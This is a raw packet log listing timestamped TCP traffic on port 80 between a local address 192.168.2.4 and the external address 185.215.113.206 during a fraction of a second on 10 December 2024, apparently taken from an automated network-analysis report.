Dec 10, 2024 00:42:26.737976074 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.738023043 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.738297939 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.738346100 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.738373041 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.738411903 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.739124060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.739170074 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.739226103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.739268064 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.739989996 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.740056038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.740158081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.740202904 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.740783930 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.740840912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.740850925 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.740890980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.741616011 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.741660118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.741669893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.741713047 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.742461920 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.742506981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.742528915 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.742569923 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.743287086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.743330956 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.743335962 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.743371964 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.744096994 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.744146109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.744225979 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.744271994 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.744945049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.744985104 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.744990110 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.745023012 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.745783091 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.745822906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.745831013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.745858908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.746593952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.746642113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.747051954 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.747097969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.747411966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.747456074 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.747534037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.747575998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.748259068 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.748298883 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.748369932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.748416901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.749074936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.749124050 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.749134064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.749172926 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.749921083 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.749965906 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.750030041 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.750094891 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.750713110 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.750758886 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.750787973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.750828028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.751557112 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.751607895 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.751638889 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.751682997 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.752372026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.752417088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.752429008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.752464056 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.753252983 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.753298998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.753353119 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.753391981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.754031897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.754080057 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.754101992 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.754143000 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.754863977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.754895926 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.754909992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.754931927 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.809150934 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.809214115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.809246063 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.809287071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.809575081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.809622049 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.809691906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.809736967 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.810412884 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.810458899 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.810533047 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.810575008 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.811213970 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.811261892 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.811338902 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.811384916 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.812033892 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.812089920 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.812153101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.812199116 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.812886953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.812933922 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.813064098 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.813111067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.813710928 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.813757896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.813805103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.813846111 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.814528942 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.814594030 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.814609051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.814647913 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.815366030 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.815412998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.815440893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.815483093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.816178083 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.816225052 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.816279888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.816323996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.817019939 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.817076921 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.817135096 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.817188025 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.817835093 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.817883968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.817926884 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.817979097 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.818656921 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.818721056 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.818752050 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.818810940 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.819489002 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.819536924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.819591045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.819639921 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.820348024 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.820398092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.820508003 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.820559978 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.821213007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.821264029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.821321011 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.821372986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.821990013 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.822038889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.822052956 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.822135925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.822801113 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.822851896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.822931051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.822983980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.823652029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.823702097 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.823756933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.823812962 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.824484110 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.824533939 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.824611902 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.824660063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.825320005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.825371027 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.825449944 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.825499058 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.826138973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.826191902 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.826265097 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.826318026 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.826957941 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.827004910 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.827135086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.827181101 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.827802896 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.827852964 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.827923059 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.827970028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.828669071 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.828716993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.828782082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.828824997 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.829447985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.829495907 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.829575062 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.829617977 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.830357075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.830404997 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.830413103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.830462933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.831134081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.831187010 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.831192017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.831232071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.832006931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.832048893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.832053900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.832092047 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.832772017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.832830906 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.832921982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.832967043 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.929176092 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.929251909 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.929359913 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.929488897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.929536104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.929619074 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.929663897 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.930320024 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.930367947 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.930392027 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.930433035 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.931154966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.931253910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.931308985 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.931993961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.932043076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.932095051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.932142019 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.932816029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.932852983 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.932876110 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.932904005 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.933686018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.933736086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.933778048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.934472084 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.934540033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.934571028 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.934614897 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.935297012 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.935359955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.935383081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.935426950 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.936105967 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.936155081 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.936219931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.936265945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.936948061 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.937001944 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.937030077 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.937072992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.937771082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.937822104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.937841892 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.937886953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.938606977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.938658953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.938687086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.938730001 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.939420938 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.939541101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.939610958 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.940258026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.940321922 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.940340996 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.940380096 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.941087008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.941143036 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.941174984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.941222906 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.941921949 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.941965103 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.941983938 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.942023993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.942740917 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.942786932 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.942817926 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.942883015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.943573952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.943689108 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.943738937 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.944397926 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.944447994 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.944504976 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.944550991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.945209026 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.945255041 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.945317030 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.945363045 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.946047068 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.946093082 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.946125984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.946165085 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.946876049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.946919918 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.946985006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.947036028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:26.947700977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:26.951194048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.002664089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.002720118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.002777100 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.002825975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.003040075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.003093004 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.003125906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.003206015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.003890991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.003962994 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.003964901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.004003048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.004709959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.004760981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.004829884 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.004878998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.005526066 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.005577087 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.005620003 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.005667925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.006359100 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.006405115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.006458044 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.006500959 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.007184029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.007235050 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.007262945 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.007302999 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.007993937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.008042097 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.008099079 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.008147955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.008857965 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.008903980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.008977890 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.009021997 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.009692907 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.009742975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.009809971 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.009850025 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.010534048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.010585070 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.010690928 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.010739088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.011346102 CET	80	49749	185.215.113.206	192.168.2.4
